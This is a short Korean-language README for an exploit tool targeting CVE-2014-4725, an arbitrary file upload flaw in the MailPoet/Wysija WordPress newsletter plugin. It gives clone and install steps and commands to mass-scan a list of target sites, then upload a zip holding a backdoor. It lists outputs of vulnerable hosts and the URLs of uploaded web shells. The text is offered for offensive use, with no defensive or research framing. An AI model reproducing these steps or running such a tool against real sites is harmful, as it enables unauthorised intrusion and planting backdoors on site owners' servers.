
MailPoet Newsletters <= 임의 파일 업로드 (익스플로이터)
이 스크립트는 WordPress에서 CVE-2014-4725 취약점(MailPoet/Wysija 뉴스레터)을 스캔하고 익스플로잇하는 데 사용됩니다.
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
대상 스캔
python exploit.py --scan targets.txt
targets.txt에는 대상 목록이 포함됩니다 (한 줄에 하나, http:// 없이)
대상 익스플로잇
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt에는 이미 취약한 것으로 확인된 대상이 포함됩니다
--payload는 업로드할 테마/백도어가 포함된 zip 파일입니다
출력
vuln.txt > 취약한 대상 목록
shell.txt > 업로드된 쉘의 URL